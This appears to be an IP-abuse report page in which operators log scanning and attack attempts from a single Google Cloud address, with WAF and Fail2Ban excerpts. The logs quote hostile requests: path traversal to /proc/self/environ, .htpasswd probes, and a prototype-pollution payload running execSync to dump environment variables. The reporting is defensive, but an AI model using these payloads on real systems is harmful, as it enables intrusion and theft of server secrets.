๐บ๐ธ
ipblock.com
2026-10-05 10:41:00
(2 days ago)
IPBlock protected site ID [4055-d][s=03].
Exploit request, vulnerability scanner.
Hacking
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-05 09:00:40
(2 days ago)
(mod_security) mod_security (id:210730) triggered by 136.69.238.13 (13.238.69.136.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 136.69.238.13 (13.238.69.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Oct 05 05:00:32.685078 2026] [security2:error] [pid 19877:tid 19974] [client 136.69.238.13:0] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||raytbrown.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "raytbrown.com"] [uri "/z9x8c7v6b5-debug-trigger-raytbrown.com"] [unique_id "asNnMN1V7qfF5Z-2M0VAygAAABc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ช๐ธ
elcruzado.es
2026-10-05 07:57:57
(2 days ago)
(apache-useragents) Failed apache-useragents trigger with match [redacted] from 136.69.238.13 (US/Un ...
show more
(apache-useragents) Failed apache-useragents trigger with match [redacted] from 136.69.238.13 (US/United States/13.238.69.136.bc.googleusercontent.com)
show less
Bad Web Bot
Anonymous
2026-10-05 07:10:22
(2 days ago)
2026/10/05 07:10:19 [error] 3693535#3693535: *33170 [client 136.69.238.13] ModSecurity: Access denie ...
show more
2026/10/05 07:10:19 [error] 3693535#3693535: *33170 [client 136.69.238.13] ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:BLOCKING_INBOUND_ANOMALY_SCORE' (Value: `40' ) [file "/usr/local/owasp-modsecurity-crs-4.11.0/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "222"] [id "949110"] [rev ""] [msg "Inbound Anomaly Score Exceeded (Total Score: 40)"] [data ""] [severity "0"] [ver "OWASP_CRS/4.30.0"] [maturity "0"] [accuracy "0"] [tag "anomaly-evaluation"] [tag "OWASP_CRS"] [hostname "ingeltechgh.com"] [uri "/"] [unique_id "179118421995.159396"] [ref ""], client: 136.69.238.13, server: ingeltechgh.com, request: "POST / HTTP/2.0", host: "ingeltechgh.com"
2026/10/05 07:10:20 [error] 3693535#3693535: *33170 [client 136.69.238.13] ModSecurity: Access denied with code 403 (phase 2). Matched "Operator `Ge' with parameter `5' against variable `TX:BLOCKING_INBOUND_ANOMALY_SCORE' (Value: `5' ) [file "/usr/local/owasp-modsecurity-crs-
...
show less
Brute-Force
๐บ๐ธ
TPI-Abuse
2026-10-05 07:02:55
(2 days ago)
(mod_security) mod_security (id:210492) triggered by 136.69.238.13 (13.238.69.136.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210492) triggered by 136.69.238.13 (13.238.69.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Oct 05 03:02:51.643802 2026] [security2:error] [pid 32691:tid 32691] [client 136.69.238.13:0] ModSecurity: Access denied with code 403 (phase 1). Matched phrase ".htpasswd" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "hvacs-aircon.com"] [uri "/.htpasswd"] [unique_id "asNLmxN_9G0hrxcDrI1EXAAAAAA"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ฉ๐ช
bazter.pro
2026-10-05 06:25:11
(2 days ago)
Fail2Ban: plesk-bot-aggressive - 15 failures
Port Scan
Bad Web Bot
Web App Attack
๐ฉ๐ช
bazter.pro
2026-10-05 05:57:14
(2 days ago)
Fail2Ban: apache-ratelimit - 20 failures
Port Scan
Bad Web Bot
Web App Attack
๐จ๐ญ
dalslab ltd
2026-10-05 05:39:43
(2 days ago)
136.69.238.13 - - [05/Oct/2026:07:39:41 +0200] "POST / HTTP/1.1" 405 154 "-" "Mozilla/5.0 (compatibl ...
show more
136.69.238.13 - - [05/Oct/2026:07:39:41 +0200] "POST / HTTP/1.1" 405 154 "-" "Mozilla/5.0 (compatible; Kimi-SearchBot/1.0; +https://kimi.ai/)"
136.69.238.13 - - [05/Oct/2026:07:39:41 +0200] "POST /graphql HTTP/1.1" 405 556 "http://dalslab.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/153.0.0.0 Safari/537.36"
136.69.238.13 - - [05/Oct/2026:07:39:41 +0200] "GET /public/plugins/text/../../../../../../../../proc/self/environ HTTP/1.1" 400 154 "-" "-"
136.69.238.13 - - [05/Oct/2026:07:39:42 +0200] "POST /api/graphql HTTP/1.1" 405 556 "http://dalslab.com" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/153.0.0.0 Safari/537.36"
136.69.238.13 - - [05/Oct/2026:07:39:42 +0200] "POST /login HTTP/1.1" 405 154 "-" "Mozilla/5.0 (compatible; Qwenbot/1.0; +https://qwen.alibaba.com/)"
...
show less
Web Spam
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-05 05:28:14
(2 days ago)
(mod_security) mod_security (id:210730) triggered by 136.69.238.13 (13.238.69.136.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 136.69.238.13 (13.238.69.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Oct 05 01:28:07.832847 2026] [security2:error] [pid 6111:tid 6111] [client 136.69.238.13:36696] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||cms2020.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "cms2020.com"] [uri "/z9x8c7v6b5-debug-trigger-cms2020.com"] [unique_id "asM1Z3kxPChCTpfpx9kZfwAAABc"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-05 04:26:05
(2 days ago)
(mod_security) mod_security (id:210492) triggered by 136.69.238.13 (13.238.69.136.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210492) triggered by 136.69.238.13 (13.238.69.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Mon Oct 05 00:25:59.437103 2026] [security2:error] [pid 9362:tid 9362] [client 136.69.238.13:59984] ModSecurity: Access denied with code 403 (phase 1). Matched phrase ".htpasswd" at REQUEST_URI. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "aim-controls.com"] [uri "/.htpasswd"] [unique_id "asMm1597ljI235jJ5H8R5QAAAAw"]
show less
Brute-Force
Bad Web Bot
Web App Attack
๐ณ๐ฑ
Site.eu
2026-10-05 03:59:31
(2 days ago)
Excessive multi-domain requests
Brute-Force
๐จ๐ญ
4server
2026-10-05 03:42:43
(2 days ago)
[MonOct0505:42:37.0048422026][security2:error][pid133398:tid133422][client136.69.238.13:0]ModSecurit ...
show more
[MonOct0505:42:37.0048422026][security2:error][pid133398:tid133422][client136.69.238.13:0]ModSecurity:Accessdeniedwithcode403\(phase2\).Matchedphrase\"proc/self/\"atARGS:0.[file\"/etc/apache2/conf.d/modsec_rules/10_asl_rules.conf\"][line\"135\"][id\"344360\"][rev\"5\"][msg\"Atomicorp.comWAFRules:UnauthorizedOperatingSystemFileAccessAttempt\"][data\"MatchedData:proc/self/foundwithinARGS:0:{\\\\x22then\\\\x22:\\\\x22\$1:__proto__:then\\\\x22\,\\\\x22status\\\\x22:\\\\x22resolved_model\\\\x22\,\\\\x22reason\\\\x22:-1\,\\\\x22value\\\\x22:\\\\x22{/\\\\x22then/\\\\x22:/\\\\x22\$b1337/\\\\x22}\\\\x22\,\\\\x22_response\\\\x22:{\\\\x22_prefix\\\\x22:\\\\x22process.mainmodule.require\(\'child_process\'\).execsync\(\'env2\>/dev/null\|\|cat/proc/self/environ2\>/dev/null\'\)\;\\\\x22\,\\\\x22_formdata\\\\x22:{\\\\x22get\\\\x22:\\\\x22\$1:constructor:constructor\\\\x22}}}\"][severity\"CRITICAL\"][tag\"attack-lfi\"][hostname\"aid-web.com\"][uri\"/\"][unique_id\"asMcrUBIcTnm5syqzuDpJwAAAFY\"]
show less
Hacking
Web App Attack
๐ฎ๐น
VHosting
2026-10-05 03:10:04
(2 days ago)
Detected WordPress attack from different servers
Brute-Force
Web App Attack
๐ฌ๐ง
consul.to
2026-10-05 03:07:17
(2 days ago)
Web attack/malicious scanning detected
Web App Attack
๐บ๐ธ
TPI-Abuse
2026-10-05 02:56:28
(2 days ago)
(mod_security) mod_security (id:210730) triggered by 136.69.238.13 (13.238.69.136.bc.googleuserconte ...
show more
(mod_security) mod_security (id:210730) triggered by 136.69.238.13 (13.238.69.136.bc.googleusercontent.com): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Sun Oct 04 22:56:24.656660 2026] [security2:error] [pid 2891:tid 2891] [client 136.69.238.13:43866] ModSecurity: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "4"] [msg "COMODO WAF: URL file extension is restricted by policy||aholsniffsglue.com|F|2"] [data ".com"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "aholsniffsglue.com"] [uri "/z9x8c7v6b5-debug-trigger-aholsniffsglue.com"] [unique_id "asMR2DL6pudaBXwbd_TpjgAAABo"]
show less
Brute-Force
Bad Web Bot
Web App Attack